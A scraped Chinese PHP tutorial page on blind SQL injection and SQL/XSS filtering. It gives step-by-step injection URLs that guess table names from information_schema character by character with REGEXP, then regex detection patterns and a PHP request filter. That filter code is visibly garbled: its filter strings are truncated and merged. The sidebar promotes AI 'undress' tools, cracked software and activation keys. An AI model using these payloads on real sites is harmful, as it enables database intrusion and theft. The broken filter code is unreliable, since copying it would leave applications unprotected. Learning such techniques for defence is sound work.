search
Homephp教程php手册php中常见的sql攻击正则表达式汇总

php中常见的sql攻击正则表达式汇总

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Jun 06, 2016 pm 08:18 PM
phpregular expression

这篇文章主要介绍了php中常见的sql攻击正则表达式,实例汇总了针对各种常见的SQL语句及正则表达式原理的分析与应用,对于PHP程序设计的安全来说具有很好的参考借鉴

本文实例讲述了php中常见的sql攻击正则表达式。分享给大家供大家参考。具体分析如下:

我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息。故攻击方式如下:

1. 判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli是假设已知的库名。
注:正则表达式中 ^[a-z] 表示字符串中开始字符是在 a-z范围内

复制代码 代码如下:

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*

2. 判断第一个字符是否是a-n中的字符

复制代码 代码如下:

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables  WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*

3. 确定该字符为n

复制代码 代码如下:

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables  WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1) /*

4. 表达式的更换如下

复制代码 代码如下:

expression like this:  '^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE


这时说明表名为news ,要验证是否是该表明 正则表达式为'^news$',但是没这必要 直接判断 table_name = 'news‘ 不就行了。

5.接下来猜解其它表了 只需要修改 limit 1,1 -> limit 2,1就可以对接下来的表进行盲注了。

例如:

复制代码 代码如下:

$Exec_Commond  = "( \s|\S)*(exec(\s|\+)+(s|x)p\w+)(\s|\S)*";
$Simple_XSS = "( \s|\S)*((%3C)|)(\s|\S)*";
$Eval_XSS  = "( \s|\S)*((%65)|e)(\s)*((%76)|v)(\s)*((%61)|a)(\s)*((%6C)|l)(\s|\S)*";
$Image_XSS  = "( \s|\S)*((%3C)|)(\s|\S)*" ;
$Script_XSS = "( \s|\S)*((%73)|s)(\s)*((%63)|c)(\s)*((%72)|r)(\s)*((%69)|i)(\s)*((%70)|p)(\s)*((%74)|t)(\s|\S)*";
$SQL_Injection = "( \s|\S)*((%27)|(')|(%3D)|(=)|(/)|(%2F)|(")|((%22)|(-|%2D){2})|(%23)|(%3B)|(;))+(\s|\S)*";

sql攻击代码:

复制代码 代码如下:

function customError($errno, $errstr, $errfile, $errline)
{
    echo "Error number: [$errno],error on line $errline in $errfile
";
    die();
}
set_error_handler("customError",E_ERROR);
$getfilter="'|(and|or)\b.+?(>| $postfilter="\b(and|or)\b.{1,6}?(=|>| $cookiefilter="\b(and|or)\b.{1,6}?(=|>| function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq)
{   
    if(is_array($StrFiltValue))
    {
        $StrFiltValue=implode($StrFiltValue);
    }
    if (preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1&&!isset($_REQUEST['securityToken']))
    {
        slog("

操作IP: ".$_SERVER["REMOTE_ADDR"]."
操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."
操作页面:".$_SERVER["PHP_SELF"]."
提交方式: ".$_SERVER["REQUEST_METHOD"]."
提交参数: ".$StrFiltKey."
提交数据: ".$StrFiltValue);
        print "result notice:Illegal operation!";
        exit();
    }
}
foreach($_GET as $key=>$value)
{
    StopAttack($key,$value,$getfilter);
}
foreach($_POST as $key=>$value)
{
    StopAttack($key,$value,$postfilter);
}
foreach($_COOKIE as $key=>$value)
{
    StopAttack($key,$value,$cookiefilter);
}
  
function slog($logs)
{
    $toppath="log.htm";
    $Ts=fopen($toppath,"a+");
    fputs($Ts,$logs."rn");
    fclose($Ts);
}
?>


sql分析:

如果使用这个函数的话,这个函数会绕开PHP的标准出错处理,,所以说得自己定义报错处理程序(die())。
其次,如果代码执行前就发生了错误,那个时候用户自定义的程序还没有执行,所以就不会用到用户自己写的报错处理程序。 

那么,PHP里有一套错误处理机制,可以使用set_error_handler()接管PHP错误处理,也可以使用trigger_error()函数主动抛出一个错误。

set_error_handler()函数设置用户自定义的错误处理函数。函数用于创建运行期间的用户自己的错误处理方法。它需要先创建一个错误处理函数,然后设置错误级别。   
关于的用法:

复制代码 代码如下:

Statement
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Show More

Hot Article

Assassin's Creed Shadows: Seashell Riddle Solution
3 weeks agoByDDD
What's New in Windows 11 KB5054979 & How to Fix Update Issues
2 weeks agoByDDD
Where to find the Crane Control Keycard in Atomfall
3 weeks agoByDDD
Assassin's Creed Shadows - How To Find The Blacksmith And Unlock Weapon And Armour Customisation
1 months agoByDDD
Roblox: Dead Rails - How To Complete Every Challenge
3 weeks agoByDDD
Show More

Hot Tools

SecLists

SecLists

SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.

WebStorm Mac version

WebStorm Mac version

Useful JavaScript development tools

Atom editor mac version download

Atom editor mac version download

The most popular open source editor

EditPlus Chinese cracked version

EditPlus Chinese cracked version

Small size, syntax highlighting, does not support code prompt function

DVWA

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software

Show More

Hot Topics

Where is the login entrance for gmail email?
7630
15
CakePHP Tutorial
1389
52
What is the format of the account name of steam
89
11
win11 activation key permanent
70
19
nyt connections hints and answers
31
141
Show More